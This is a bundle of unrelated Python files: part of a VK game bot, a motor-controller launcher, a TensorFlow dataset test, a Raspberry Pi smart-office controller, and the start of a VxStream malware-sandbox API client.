vk.method("messages.send", {"peer_id": id,
"message": bshltr(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'прoдать':
vk.method("messages.send", {"peer_id": id,
"message": "Выберите что продать"
"\n"
"\n 💻 Пкомп" \
"\n 🛡 Пвпн" \
"\n 🚪 Пубежище",
"keyboard": selldarkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пкомп':
vk.method("messages.send", {"peer_id": id,
"message": scomps(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пвпн':
vk.method("messages.send", {"peer_id": id,
"message": svpn(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пубежище' or body.lower() == 'пубеж':
vk.method("messages.send", {"peer_id": id,
"message": sshltr(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'улучшения' or body.lower() == 'улучшение' or body.lower() == '⬅ улучшения':
vk.method("messages.send", {"peer_id": id,
"message": upl(),
"keyboard": uplmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'хп' or body.lower() == '💊 хп':
vk.method("messages.send", {"peer_id": id,
"message": hpup(id),
"keyboard": phpmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'защита' or body.lower() == '🕶 защита':
vk.method("messages.send", {"peer_id": id,
"message": defup(id),
"keyboard": pdefmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'урон' or body.lower() == '🔫 урон':
vk.method("messages.send", {"peer_id": id,
"message": dmgup(id),
"keyboard": pdamagemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пхп' or body.lower() == "прокачать хп":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "хп":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": php(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пдеф' or body.lower() == "прокачать защиту":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "защиту":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": pdef(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пурон' or body.lower() == "прокачать урон":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "урон":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": pdmg(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'битва':
vk.method("messages.send", {"peer_id": id,
"message": "🔫 Выберите вид битвы",
"keyboard": battlemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Хакерство
else:
vk.method("messages.send", {"peer_id": id,
"message": "Увы, но такой команды нет\nПосмотреть их список можно написав 'команды'\n\nДля связи с администрацией, используйте 'репорт'",
"keyboard": errormenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
temp = ff["banned"].split()
idd = temp[0]
reason = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы заблокированы vk.com/id" + idd + "\nПо причине: " + reason,
"random_id": random.randint(1, 2147483647)})
except:
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы заблокированы",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "К сожалению,я могу распознать только текст :(",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
except BaseException as E:
log("system | " + str(id) + " | ", E)
pass
|
app.py
|
from motor_controller import start_motor_controller
from web_server import start_webserver
from discovery_service import discovery
from multiprocessing import Process
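# Startup order: bring up the motor controller, launch the discovery service in its own
# process, then block in the web server, which is handed the motor controller instance.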
if __name__ == '__main__':
mc = start_motor_controller()
p = Process(target=discovery)
p.start()
start_webserver(mc)
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
main V2 BETA 2.0 .py
|
import serial # For Bluetooth
from nanpy import (ArduinoApi, SerialManager) # For Arduino
import RPi.GPIO as GPIO # For Raspberry Pi
from threading import Thread
from time import sleep, time
import os
from Adafruit_CharLCD import Adafruit_CharLCD
import socket
# Bluetooth Serial Connection
ser = serial.Serial('/dev/ttyS0', 9600, timeout = 0)
# Arduino Nanpy Connection
connection = SerialManager()
a = ArduinoApi(connection = connection)
# Python Variables
sysMode = 0
serialRead = 0
check_mode = 1
IP = 0
v_LCD = [None,None,None]
lights_STT = [0,0,0,0]
temp_STT = 0
motion_STT = 0
# GPIO Variables
SMOKE_IN = 19
TRIG = 2
ECHO = 3
# GPIO Pins
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(SMOKE_IN, GPIO.IN)
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
# LCD GPIO Pins
lcd_af = Adafruit_CharLCD(rs=26, en=12, d4=13, d5=6, d6=5, d7=11, cols=16, lines=2) # GPIO.BCM
# Arduino Variables
office = 13
r_office = 4
kitchen = 12
r_kitchen = 2
meeting_room = 3
r_meeting_room = 5
waiting_room = 7
r_waiting_room = 14
employee_room = 9
bath_room = 8
buzzer = 22
fan = 52
# Arduino Pins
a.pinMode(office, a.OUTPUT)
a.pinMode(r_office, a.INPUT)
a.pinMode(kitchen, a.OUTPUT)
a.pinMode(r_kitchen, a.INPUT)
a.pinMode(meeting_room, a.OUTPUT)
a.pinMode(r_meeting_room, a.INPUT)
a.pinMode(waiting_room, a.OUTPUT)
a.pinMode(r_waiting_room, a.INPUT)
a.pinMode(employee_room, a.OUTPUT)
a.pinMode(bath_room, a.OUTPUT)
a.pinMode(buzzer, a.OUTPUT)
a.pinMode(fan, a.OUTPUT)
# IP Address Function
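# (Trick: connecting a UDP socket to 8.8.8.8 makes the OS pick the outbound interface;
#  getsockname() then returns that interface's local address. No data is actually sent.)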
def ip_address():
return [
(s.connect(('8.8.8.8', 53)),
s.getsockname()[0],
s.close()) for s in
[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]
][0][1]
# LCD Variable Function
def LCD(line1, line2, delay):
v_LCD [0] = line1
v_LCD [1] = line2
v_LCD [2] = delay
# Light Resistor Function
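# (If the LDR input reads HIGH the room light is switched off, otherwise it is switched on;
#  presumably HIGH means enough ambient light, depending on sensor wiring. lights_STT[num]
#  only suppresses repeated "is OFF" LCD messages.)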
def r_room(ldr, room, name, num):
if a.digitalRead(ldr) == True:
a.digitalWrite(room, a.LOW)
if lights_STT [num] < 1:
LCD(name, 'is OFF', 2)
lights_STT [num] = lights_STT [num] + 1
elif a.digitalRead(ldr) == False:
a.digitalWrite(room, a.HIGH)
LCD(name, 'is ON', 2)
lights_STT [num] = 0
# Manual Control
def m_room(on, off, room, name):
if serialRead == on:
a.digitalWrite(room, a.HIGH)
LCD(name, 'is ON', 2)
elif serialRead == off:
a.digitalWrite(room, a.LOW)
LCD(name, 'is OFF', 2)
# Mobile Check
def m_check(room, on, off):
if a.digitalRead(room) == True:
ser.write(on)
elif a.digitalRead(room) == False:
ser.write(off)
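# (Keeps the mobile side in sync over Bluetooth: an uppercase byte reports that the given
#  room light is ON, the matching lowercase byte reports OFF.)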
# Lights Thread
def lights():
while True:
# Global Variables
global sysMode
global serialRead
global office
global r_office
global kitchen
global r_kitchen
global meeting_room
global r_meeting_room
global waiting_room
global r_waiting_room
global employee_room
global bath_room
global check_mode
# Bluetooth Serial Variable
serialRead = ser.readline()
serialRead = serialRead.decode().strip()
# System Mode Check
if serialRead == "9":
sysMode = 1
LCD('SmartX', 'Automatic', 1)
elif serialRead == "0":
sysMode = 0
LCD('SmartX', 'Manual', 1)
# Automatic Mode
if sysMode == 0:
r_room(r_office, office, 'Office', 0)
r_room(r_kitchen, kitchen, 'Kitchen', 1)
r_room(r_meeting_room, meeting_room, 'Meeting Room', 2)
r_room(r_waiting_room, waiting_room, 'Waiting Room', 3)
check_mode = 0
# Manual Mode
elif sysMode == 1:
# Check The Light Status
if check_mode < 50:
m_check(waiting_room, b"D", b"d")
m_check(kitchen, b"G", b"g")
m_check(office, b"V", b"v")
m_check(bath_room, b"H", b"h")
m_check(employee_room, b"K", b"k")
m_check(meeting_room, b"F", b"f")
m_check(meeting_room, b"F\n", b"f\n")
check_mode = check_mode + 1
# Manual Mode Serial Check
m_room("1", "2", waiting_room, 'Waiting Room')
m_room("3", "4", kitchen, 'Kitchen')
m_room("5", "6", office, 'Office')
m_room("7", "8", bath_room, 'Bathroom')
m_room("e", "r", employee_room, 'Employee Room')
m_room("m", "t", meeting_room, 'Meeting Room')
# Smoke Thread
def smoke():
while True:
# Global Variables
global buzzer
# Get Smoke Status
if GPIO.input(SMOKE_IN) == False:
a.digitalWrite(buzzer, a.HIGH)
LCD('Kitchen', 'Smoke Detected', 2)
ser.write(b"S")
sleep(2)
a.digitalWrite(buzzer, a.LOW)
LCD('Kitchen', 'No Smoke Now', 2)
os.system('echo "SmartX detected smoke or gas in your apartment\nPlease be safe" | mail -s "Smoke or gas detected in your apartment" moksha.elghabaty@hotmail.com')
ser.write(b"s")
sleep(15)
os.system('echo "there is no smoke now in your apartment" | mail -s "No smoke or gas now in your apartment" moksha.elghabaty@hotmail.com')
else:
a.digitalWrite(buzzer, a.LOW)
sleep(2)
# Temperature Thread
def temp():
while True:
# Global Variables
global temp_STT
        # Get The Temperature Value
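        # (w1_slave is the 1-Wire sysfs output of a DS18B20-type sensor: its second line ends
        #  with "t=<millidegrees C>", hence the parsing below and the division by 1000.)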
tempfile = open("/sys/bus/w1/devices/28-000002f53b3e/w1_slave")
thetext = tempfile.read()
tempfile.close()
tempdata = thetext.split("\n")[1].split(" ")[9]
temprature = float(tempdata[2:])
temprature = temprature / 1000
temprature = int(temprature)
#print temprature
if temprature > 30:
a.digitalWrite(fan, a.HIGH)
LCD('Control Center', 'Fan ON', 2)
ser.write(b"Z")
temp_STT = 0
else:
a.digitalWrite(fan, a.LOW)
if temp_STT < 1:
LCD('Control Center', 'Fan OFF', 2)
ser.write(b"z")
temp_STT = temp_STT + 1
# Motion Thread
def motion():
while True:
# Global Variables
global buzzer
global motion_STT
# Get Motion Value
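        # (HC-SR04-style ultrasonic ranging: pulse TRIG for ~10 us, time how long ECHO stays
        #  high, then distance in cm = elapsed * 34300 / 2, i.e. speed of sound out and back.)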
GPIO.output(TRIG, True)
sleep(0.00001)
GPIO.output(TRIG, False)
start = time()
while GPIO.input(ECHO)==0:
start = time()
while GPIO.input(ECHO)==1:
stop = time()
elapsed = stop-start
distance = (elapsed * 34300)/2
sleep(0.5)
int_distance = int(distance)
if int_distance < 8:
a.digitalWrite(buzzer, a.HIGH)
LCD('Lane', 'Motion Detected', 2)
sleep(1)
ser.write(b"W")
motion_STT = 0
else:
a.digitalWrite(buzzer, a.LOW)
if motion_STT < 1:
LCD('Lane', 'No Motion Now', 2)
sleep(2)
ser.write(b"w")
motion_STT = motion_STT + 1
#LCD Print Thread
def LCD_print():
# LCD Welcome Screen
IP = ip_address()
LCD('SmartX', IP, 5)
while True:
if v_LCD [0] != None and v_LCD [1] != None and v_LCD [2] != None:
lcd_af.clear()
lcd_af.message(v_LCD [0] + '\n' + v_LCD [1])
sleep(v_LCD [2])
lcd_af.clear()
IP = ip_address()
lcd_af.message('SmartX' + '\n' + IP)
v_LCD [0] = None
v_LCD [1] = None
v_LCD [2] = None
else:
IP = ip_address()
lcd_af.message('SmartX' + '\n' + IP)
# Run The Threads
if __name__ == '__main__':
Thread(target = lights).start()
Thread(target = smoke).start()
Thread(target = temp).start()
Thread(target = motion).start()
Thread(target = LCD_print).start()
|
vxstreamlib.py
|
# vim: sw=4:ts=4:et
import gzip
import hashlib
import io
import json
import logging
import os.path
import re
import shutil
import smtplib
import sys
import tempfile
import threading
import time
import traceback
import warnings
import zipfile
from subprocess import Popen, PIPE
import requests
__all__ = [
'VXSTREAM_STATUS_UNKNOWN',
'VXSTREAM_STATUS_IN_QUEUE',
'VXSTREAM_STATUS_IN_PROGRESS',
'VXSTREAM_STATUS_ERROR',
'VXSTREAM_STATUS_SUCCESS',
'VxStreamServer',
'VxStreamSubmission',
'VXSTREAM_DOWNLOAD_JSON',
'VXSTREAM_DOWNLOAD_XML',
'VXSTREAM_DOWNLOAD_HTML',
'VXSTREAM_DOWNLOAD_SAMPLE',
'VXSTREAM_DOWNLOAD_PCAP',
'VXSTREAM_DOWNLOAD_MEMORY',
]
# default installation directory
VXSTREAM_BASE_DIR = '/opt/vxstream'
# sample submission status
VXSTREAM_STATUS_UNKNOWN = 'UNKNOWN'
VXSTREAM_STATUS_IN_QUEUE = 'IN_QUEUE'
VXSTREAM_STATUS_IN_PROGRESS = 'IN_PROGRESS'
VXSTREAM_STATUS_ERROR = 'ERROR'
VXSTREAM_STATUS_SUCCESS = 'SUCCESS'
# result types
VXSTREAM_DOWNLOAD_JSON = 'json'
VXSTREAM_DOWNLOAD_XML = 'xml'
VXSTREAM_DOWNLOAD_HTML = 'html'
VXSTREAM_DOWNLOAD_SAMPLE = 'bin'
VXSTREAM_DOWNLOAD_PCAP = 'pcap'
VXSTREAM_DOWNLOAD_MEMORY = 'memory'
# for extracting file paths from 7z command output
REGEX_7Z = re.compile(r'^Extracting\s+(.+)$')
# required user-agent settings
VXSTREAM_HEADERS = { 'User-agent': 'VxStream Sandbox' }
# some symbolic names for indexes
class VxStreamDownloadResults(object):
def __init__(self, submission):
self.submission = submission
self.json_path = None
self.pcap_path = None
self.xml_path = None
self.html_path = None
self.dropped_files = []
self.memory_dump_files = []
self.combined_memory_dump_path = None
#def all_files(self):
#"""Returns a list of all files collected from the vxstream analysis."""
#result = []
#for file_path in [
#self.json_path,
#self.pcap_path,
#self.xml_path,
#self.html_path ]:
#if file_path is not None:
#result.append(file_path)
#result.extend(self.dropped_files)
#result.extend(self.memory_dump_files)
#if self.combined_memory_dump_path is not None:
#result.append(self.combined_memory_dump_path)
#return result
class VxStreamSubmission(object):
"""Represents a sample that was submitted to VxStream."""
def __init__(self, file_name, sha256, environment_id):
self.file_name = file_name
self.sha256 = sha256
self.environment_id = environment_id
self.status = None
def __str__(self):
return self.file_name
class VxStreamSubmissionManager(object):
"""Utility class that manages multiple submissions with notification callbacks."""
def __init__(self, server, submissions, delay=1):
assert isinstance(server, VxStreamServer)
assert delay >= 1
assert len(submissions) > 0
self.server = server
self.submissions = {} # key = sha256, value = VxStreamSubmission
self.callbacks = [] # a list of functions to call when the status of a sample has changed
# how often to check sample status
self.delay = delay
        # controls the thread
        self.shutdown = False
        self.thread = None
for submission in submissions:
self.submissions[submission.sha256] = submission
def add_callback(self, callback):
"""Adds a function(server, status) to be called when the status of a sample has changed."""
self.callbacks.append(callback)
def start(self):
self.thread = threading.Thread(target=self.run, name=str(type(self)))
self.thread.daemon = True
self.thread.start()
def stop(self):
self.shutdown = True
if self.thread is not None and self.thread.is_alive():
logging.debug("stopping {}".format(self.thread))
self.thread.join(self.delay + 2) # give it two seconds to stop
if self.thread.is_alive():
logging.error("{} failed to stop".format(self.thread))
def run(self):
while not self.shutdown:
try:
self.execute()
except Exception as e:
logging.error(str(e))
traceback.print_exc()
time.sleep(1)
def execute(self):
completed = [] # list of submissions that have completed
for submission in self.submissions.values():
            result = self.server.get_status(submission.sha256, submission.environment_id)
if result == VXSTREAM_STATUS_ERROR:
logging.info("detected error in file {}".format(submission))
completed.append(submission)
elif result == VXSTREAM_STATUS_SUCCESS:
logging.info("detected completed file {}".format(submission))
completed.append(submission)
if submission.status != result:
logging.info("sample {} changed state from {} to {}".format(submission, submission.status, result))
submission.status = result
# call all notifications for this sample
for callback in self.callbacks:
try:
callback(self.server, submission)
except Exception as e:
logging.error("error executing {}: {}".format(str(callback), str(e)))
for submission in completed:
del self.submissions[submission.sha256]
if len(self.submissions) == 0:
logging.info("finished all submissions")
self.shutdown = True
def wait(self):
"""Waits for all submitted jobs to complete."""
logging.info("waiting for {} jobs to complete".format(len(self.submissions)))
while not self.shutdown:
time.sleep(1)
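# Example (illustrative sketch, not part of the original module): track a batch of
# submissions with a status-change callback. The server/submissions objects are
# assumed to come from VxStreamServer.submit(); see the __main__ block below for
# the full workflow this is based on.
#
#   def on_change(server, submission):
#       print("{} -> {}".format(submission, submission.status))
#
#   manager = VxStreamSubmissionManager(server, submissions, delay=5)
#   manager.add_callback(on_change)
#   manager.start()
#   manager.wait()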
class VxStreamServer(object):
def __init__(self, url, api_key, secret, proxies={}):
# set this to True to shut down any outstanding requests
self.shutdown = False
# base vxstream url
self.url = url
while self.url.endswith('/'):
self.url = self.url[:-1]
# various URLs we use
#self.submit_url = '{}/submit'.format(self.url)
#self.result_url = '{}/result'.format(self.url)
#self.state_url = '{}/state'.format(self.url)
self.api_key = api_key
self.secret = secret
# how long do we wait in between status requests? (in seconds)
self.query_frequency = 1
# optional proxy settings
self.proxies = proxies
def get_status(self, sha256, environment_id):
status_url = '{}/api/state/{}'.format(
self.url,
self.get_sample_url(sha256, environment_id))
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = requests.get(status_url, verify=False, headers=VXSTREAM_HEADERS, proxies=self.proxies) # XXX
if result.status_code != 200:
logging.error("got result {} from vxstream: {}".format(result.status_code, result.reason))
return None
# the result looks like this
# '{\n "response_code": 0,\n "response": {\n "state": "SUCCESS"\n }\n}'
json_result = json.loads(result.text)
logging.debug("got response_code {} state {} for sha256 {} environment_id {}".format(
json_result['response_code'],
json_result['response']['state'],
sha256,
environment_id))
return json_result['response']['state']
def get_sample_url(self, sha256, environment_id):
return '{}/?apikey={}&secret={}&environmentId={}'.format(
sha256, self.api_key, self.secret, environment_id)
    def result_url(self, sha256, environment_id, result_type):
        return '{}/api/result/{}&type={}'.format(
            self.url, self.get_sample_url(sha256, environment_id), result_type)
def reanalyze(self, file_path, environment_id):
data = {
'apikey': self.api_key,
'secret': self.secret,
